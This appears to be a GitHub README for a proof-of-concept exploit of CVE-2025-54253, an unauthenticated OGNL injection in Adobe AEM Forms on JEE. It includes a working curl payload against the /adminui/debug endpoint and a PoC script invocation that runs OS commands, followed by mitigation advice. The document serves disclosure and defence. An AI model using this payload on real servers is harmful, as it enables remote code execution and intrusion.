CVE-2025-54253 is a critical OGNL injection vulnerability in Adobe AEM Forms on JEE. It allows unauthenticated attackers to execute arbitrary operating system commands via the /adminui/debug?debug=OGNL: endpoint.
- Severity: Critical
- CVSS Score: 9.8 (Pending)
- Attack Vector: Remote
- Authentication Required: No
- Affected Product: Adobe AEM Forms on JEE (<= 6.5.23.0)
- Status: Confirmed exploitability
This vulnerability lies in an exposed debugging interface that evaluates user-controlled OGNL expressions without proper sanitization or authentication. Exploiting it can lead to remote code execution under the context of the application server.
📝 Note: This vulnerability affects installations that expose
/adminui/debugendpoint publicly or internally without proper access control.
Simple OGNL expressions demonstrate command execution via browser or curl.
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"The script logs command execution output to exploit.log:
-
Set up a vulnerable Adobe AEM instance (<= 6.5.23.0).
-
Start Flask server (if simulating locally):
-
Execute OGNL in browser:
-
Execute via curl:
-
Output from commands:
-
Flask logging view:
-
PoC script run:
-
Verbose log view:
- Python (PoC scripting)
- Flask (simulated server)
- Kali Linux
- curl & browser
- GitHub (PoC publishing)
- Restrict access to
/adminui/debug - Apply vendor patches as available
- Monitor for unauthorized OGNL expressions in access logs
- Use WAF or proxy filtering to block such patterns
⚠️ Disclaimer:
This PoC is for educational purposes only. Do not use it against systems you do not own or have explicit permission to test.
Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
🔗 LinkedIn
🔗 GitHub